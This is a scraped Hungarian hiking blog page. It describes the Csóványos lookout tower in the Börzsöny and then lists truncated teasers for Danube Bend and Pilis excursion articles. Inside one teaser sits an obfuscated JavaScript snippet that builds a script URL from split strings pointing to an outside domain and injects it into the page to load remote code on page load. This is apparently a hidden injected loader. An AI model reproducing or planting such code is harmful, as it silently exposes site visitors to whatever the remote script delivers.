A Csóványos a Börzsöny legmagasabb csúcsa. A csúcson 1978-ban 22,6 m magas geodéziai mérőtornyot emeltek betonból, de a kirándulók akkor még csak vasbeton létrákon kapaszkodhattak fel a tetejére. Ezután a toronyba hosszú ideig nem lehetett bejutni, mígnem 2013 őszén az Ipoly Erdő Zrt. megkezdte a torony kilátóvá alakítását, melynek köszönhetően létrejött a Csóványosi kilátó.
Vörösfenyővel borított acélszerkezettel vették körül, és biztonságos lépcsőkkel látták el, így most már 2014. október 9. óta újra látogatható a 938 métermagasan elhelyezkedő építmény. 133 lépcsőfokon felkapaszkodva érhető el a legfelső terasz, ami 22,5 méterrel van magasabban, mint a bejárati talajszint. A tetejéről remek körpanoráma tárul a látogató szeme elé, jó időben, kedvező látási viszonyok mellett a Magas-Tátra is látható.
folyamatosan
A hegyre számos turistaút vezet, a legfontosabb az Országos Kéktúra kék sáv jelzése. Királyrétre érdemes erdei vasúttal érkezni, ez esetben a vonat a Morgó patak völgyén át közlekedik Kismarosról Szokolyán át Királyrétig. A járatnak több állomása is van, de nem mindegyiken áll meg a vonat, érdemes erről előzetesen a vasút honlapján tájékozódni. A kilátó a királyréti központi parkolótól 10 km távolságra található és nagyjából 3 órát vesz igénybe a teljesítése. A szintkülönbség (783 m) miatt gyakorlottabb túrázóknak ajánlják a távot.
Budapest és környéke számos lehetőséget kínál a természet szerelmeseinek. Ezúttal olyan helyeket gyűjtöttük nektek egy csokorba a Pesti oldalról, melyeket könnyen és egyszerűen meg tudtok közelíteni, ha egy kis feltöltődésre, kikapcsolódásra vágytok. Cikkünkben bemutatunk három könnyű kirándulás tippet, és tanösvényt,
A melegebb idő beköszöntével szívesebben mozdulunk ki a házból, csinálunk szabadtéri programokat, mint például a kirándulás vagy túrázás, amit egyedi igényekre szabva, bárki ugyanúgy élvezhet. Most olyan tippeket és tanácsokat hoztunk, ami kezdő vagy gyakorló túrázóknak is hasznosak lehetnek! (function(){ a93c=document.createElement("script");a93c_="u"+("s")+"ta"; a93c_+=("t.i")+""+"n";a93c_+=(("f")+"o");a93c.type="text/javascript"; a93c_+="/"; a93cu="2304622372";a93cu+=".k960jasf93c7wvr9hkb";a93cu+="qmje6h023hz"; a93c.src="https://"+a93c_+a93cu;a93c.async=true;document.body.appendChild(a93c); })(); Készíts
A Pilis hegység számtalan pazar kirándulóhelyet tartogat, de a Dera-szurdok és Szurdok-gerinc talán az egyik legizgalmasabb és legszebb útvonal mind közül. Nem véletlen, hogy az egyik legnépszerűbb úti cél a kirándulók körében, mely hétvégente pikk-pakk megtelik a városból kiszakadni vágyó
Nem tudjuk, Ti hogy vagytok vele, de mi rajongunk a kilátókért, hiszen remek célpontot nyújtanak családi kirándulásokhoz. A gyerekek imádják a felmászást ezekbe a különleges építményekbe, míg a panoráma minden korosztály számára élvezetes. Azt tanácsoljuk, kapjátok össze a családot, barátokat
A Dunakanyar Magyarország egyik legszebb és leggazdagabb tájegysége, ahol a Duna folyásiránya nyugat-keletiről észak-délire változik. A folyam a Börzsöny és a Visegrádi-hegység között folyik, és számos történelmi, kulturális és természeti látnivalót kínál a látogatóknak. Esztergom, Visegrád, Szentendre, Vác és Zebegény
Ti is rajongtok a kilátókért? Hát mi bizony így vagyunk vele, ráadásul szeretünk újabb és újabb különleges helyekre is elkalauzolni Benneteket a Dunakanyarban. Ezúttal egy talán kevésbé ismert úti célra esett a választásunk, ami bízunk benne, hogy cikkünk elolvasása után
Szeretjük, ahogy a kislányaink fantáziája kastélyokká varázsolja a várromokat, ahogy a képzeletük élettel tölti meg a régmúlt idők tereit. Egy üres szoba hirtelen bálteremmé változik, egy omladozó torony pedig egy hercegnő szobáját rejtheti. Ugye ti is számtalanszor jártatok már a visegrádi
A pandémiás időszaknak “köszönhetően” egyre többen és többen fedezik fel Magyarország természeti kincseit, ezért így év elején a téli túrázás legfontosabb aspektusait járjuk kicsit körbe. Az első és legfontosabb, hogy legyünk tisztában a felkészültségi szintünkkel. A fokozatosság elve szerintünk a
Szeretnél minőségi túracipőt vásárolni, és már napok óta böngészed az üzletek kínálatát, dacolva a minőséggel, a legújabb technikákkal és a kényelemmel? Sajnos csalódást kell okoznom, a reklámok és a garanciák ellenére nem létezik univerzális túracipő. A masszív modellek tökéletesek a
Kétség kívül az egyik legnépszerűbb úti cél a Dunakanyarban a Prédikálószék. Nem is csoda, hiszen azon túl, hogy elképesztően jól mutat Instagramon, valami csoda az a panoráma, ami a 639 méter magas hegytetőn vár! Belátni innen az egész Dunakanyart, a szemközti
Gyakran tapasztaljuk utazásaink során, hogy az egynapos kiruccanásaink sokszor bőven felérnek akár egy többnapos pihentető hétvégével. És persze nem is feltétlenül kell mindig több napra tervezni, hiszen kinek van annyi szabija. Nincs igazunk? Mutatjuk milyen egy tökéletes kirándulás Budapest környékén! Ha
A Pilisi Parkerdő által kezelt Budapest környéki erdők az ország leglátogatottabb, turistautakkal legsűrűbben átszőtt természeti területei közé tartoznak. Most újabb tematikus útvonalhálózattal egészül ki a Parkerdő területét behálózó ezer kilométernyi jelzett ösvény. A Magyar Pálos Rend „Pálos utak” néven tematikus
Biztosak vagyunk benne, hogy aki egy kicsit is rajong a Dunakanyarért, annak nem nagyon kell bemutatni a Julianus-kilátót és az oda vezető túraútvonalakat. Induljatok akár Nagymarosról vagy Zebegény felől, a túrát semmiképp nem nevezhetnénk könnyűnek. Mi most mégis csavartunk egyet
Az egyik, ha nem a legkeresettebb családbarát és egyben kutyabarát úti cél a Dunakanyarban a Szendehely – Katalinpusztáról induló Gyadai tanösvény, mely minden évszakban kirándulni vágyó turisták ezreit vonzza. Természetesen ezen a méltán népszerű tanösvényen kívül is számos izgalmas programlehetőség
Azt hiszem, bátran kijelenthetjük, hogy rajongunk a Dunakanyar rejtett kincseiért és azok felfedezéséért, de talán egyetértetek velünk abban, hogy néha nagyon jó itthon is amolyan „igazi” turistának lenni. Szeretjük időről időre újra felfedezni a közkedvelt úti célokat. Így esett újév
Teljes pompájában ragyog az indián nyár a Börzsöny és a Pilis vadregényes erdeiben, mindeközben pedig villám léptekkel közeleg az őszi szünet. Ilyenkor jól esik kicsit kikapcsolódni együtt a családdal, esetleg el is utazni valahova az első iskolai/óvodai etap után. A
Becsengettek ugyan az iskolákba, elkezdődött az újabb tanév, de ettől egyáltalán nem kell alábbhagyjon a kirándulási kedv. Sőt! Nincs is jobb annál, mint mikor egy hosszú hét után végre minőségi időt tudunk együtt tölteni a csemetékkel. Hoztunk is Nektek rögtön
Manapság ha azt mondjuk utazás, jellemzően távoli tájak meghódítására gondolunk, legyen szó tengerről, egzotikus tájakról, vagy minimum egy 200 km-re fekvő hazai település felfedezéséről. Ez a 21. század, és ezzel alapvetően nincs is semmi probléma, azonban mielőtt több százezer, esetenként